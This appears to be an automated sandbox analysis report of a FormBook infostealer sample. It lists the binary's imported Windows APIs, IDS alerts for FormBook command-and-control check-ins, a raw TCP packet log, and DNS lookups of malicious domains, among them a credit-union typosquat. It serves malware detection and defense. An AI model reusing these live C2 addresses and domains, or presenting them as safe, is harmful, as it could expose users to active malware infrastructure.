WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T14:18:23.711338+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49752 | 156.226.22.233 | 80 | TCP
2024-10-08T14:19:07.778511+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49883 | 176.32.38.141 | 80 | TCP
2024-10-08T14:19:21.281956+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50011 | 199.192.21.169 | 80 | TCP
2024-10-08T14:19:43.467409+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50015 | 3.33.130.190 | 80 | TCP
2024-10-08T14:19:56.641348+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50019 | 84.32.84.32 | 80 | TCP
2024-10-08T14:20:26.593067+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Oct 8, 2024 14:19:20.664557934 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.278870106 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.279442072 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:21.281955957 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:21.281956911 CEST5001180192.168.2.4199.192.21.169
                                                                  Oct 8, 2024 14:19:21.291090965 CEST8050011199.192.21.169192.168.2.4
                                                                  Oct 8, 2024 14:19:34.384512901 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.390933037 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.391005039 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.403327942 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:34.408489943 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.855583906 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:34.855640888 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:35.911531925 CEST5001280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:35.917527914 CEST80500123.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:36.930773973 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.936045885 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:36.936121941 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.946455002 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:36.951440096 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:38.458194971 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:38.463773012 CEST80500133.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:38.463823080 CEST5001380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.476738930 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.483072996 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.483247995 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.495529890 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:39.500416040 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500473976 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500525951 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500555038 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500587940 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500636101 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500663996 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500690937 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.500719070 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.940665960 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:39.945913076 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:41.004734039 CEST5001480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:41.009896994 CEST80500143.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:42.024537086 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.029800892 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:42.035618067 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.037537098 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:42.042535067 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.465883017 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.466574907 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:43.467408895 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:43.468411922 CEST5001580192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:19:43.474503994 CEST80500153.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:19:48.529968977 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.535007000 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:48.535070896 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.545311928 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:48.550528049 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:49.021306038 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:49.021404982 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:50.053539991 CEST5001680192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:50.058880091 CEST805001684.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.069788933 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.075198889 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.075432062 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.084002972 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:51.089219093 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.535839081 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:51.538605928 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:52.598484993 CEST5001780192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:52.603261948 CEST805001784.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.618611097 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.623570919 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.627614021 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.639532089 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:53.644536018 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.644567966 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.644576073 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645231009 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645240068 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645246983 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645250082 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645252943 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:53.645256042 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:54.089215994 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:54.095535040 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:55.145564079 CEST5001880192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:55.150844097 CEST805001884.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.166920900 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.172429085 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.172497988 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.180372000 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.185410976 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641262054 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641294003 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641304016 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641315937 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641328096 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641339064 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641350031 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641347885 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641418934 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641437054 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641935110 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641944885 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641956091 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:19:56.641968966 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.641997099 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.648366928 CEST5001980192.168.2.484.32.84.32
                                                                  Oct 8, 2024 14:19:56.653604984 CEST805001984.32.84.32192.168.2.4
                                                                  Oct 8, 2024 14:20:17.839540005 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.844429016 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:17.846064091 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.854618073 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:17.859424114 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:18.324790001 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:18.324853897 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:19.364371061 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:19.707858086 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.358031034 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.358042955 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.358114004 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.402312040 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.578967094 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:20.579040051 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.592905045 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:20.597750902 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:21.055676937 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:21.055768013 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:22.099119902 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:22.225018024 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.123080015 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.459491014 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.467550993 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.475444078 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:23.480285883 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480305910 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480309963 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480314016 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480386972 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480396986 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480453014 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480460882 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:23.480473995 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:24.989150047 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:24.994601965 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:24.994652033 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.007857084 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.012877941 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.013020992 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.021681070 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.027211905 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592878103 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592982054 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.592992067 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:26.593066931 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.595278025 CEST5002380192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:26.600347996 CEST80500233.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.157586098 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.162533998 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.163671970 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.172312975 CEST5002480192.168.2.43.33.130.190
                                                                  Oct 8, 2024 14:20:32.177203894 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.620474100 CEST80500243.33.130.190192.168.2.4
                                                                  Oct 8, 2024 14:20:32.623568058 CEST5002480192.168.2.43.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 14:18:22.732892036 CEST | 63682 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:18:22.779189110 CEST | 53 | 63682 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:18:38.757663965 CEST | 58253 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:18:38.777872086 CEST | 53 | 58253 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:19:12.790566921 CEST | 64846 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:19:13.004214048 CEST | 53 | 64846 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:19:26.291313887 CEST | 64430 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:19:26.306682110 CEST | 53 | 64430 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:19:34.368849993 CEST | 56173 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:19:34.381663084 CEST | 53 | 56173 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:19:48.477114916 CEST | 49690 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:19:48.527544975 CEST | 53 | 49690 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:20:01.664063931 CEST | 55761 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:20:01.676971912 CEST | 53 | 55761 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:20:09.746516943 CEST | 61201 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:20:09.763539076 CEST | 53 | 61201 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:20:17.821336985 CEST | 61629 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:20:17.835716009 CEST | 53 | 61629 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 14:20:31.931428909 CEST | 57040 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 14:20:32.152512074 CEST | 53 | 57040 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 14:18:22.732892036 CEST | 192.168.2.4 | 1.1.1.1 | 0xd54d | Standard query (0) | www.nad5.shop | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:18:38.757663965 CEST | 192.168.2.4 | 1.1.1.1 | 0xd16a | Standard query (0) | www.impo232rt.xyz | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:12.790566921 CEST | 192.168.2.4 | 1.1.1.1 | 0xee57 | Standard query (0) | www.cenfresh.life | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:26.291313887 CEST | 192.168.2.4 | 1.1.1.1 | 0x856f | Standard query (0) | www.trafegomagico.shop | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:34.368849993 CEST | 192.168.2.4 | 1.1.1.1 | 0x54a7 | Standard query (0) | www.digitalbloom.info | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:48.477114916 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c65 | Standard query (0) | www.thepeatear.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:01.664063931 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b6a | Standard query (0) | www.mktimediato.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:09.746516943 CEST | 192.168.2.4 | 1.1.1.1 | 0x9749 | Standard query (0) | www.schoolsfrirstfcu.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:17.821336985 CEST | 192.168.2.4 | 1.1.1.1 | 0x1acd | Standard query (0) | www.crowsecurity.cloud | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:31.931428909 CEST | 192.168.2.4 | 1.1.1.1 | 0xf003 | Standard query (0) | www.myjiorooms.services | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 14:18:22.779189110 CEST | 1.1.1.1 | 192.168.2.4 | 0xd54d | No error (0) | www.nad5.shop |  | 156.226.22.233 | A (IP address) | IN (0x0001) | false
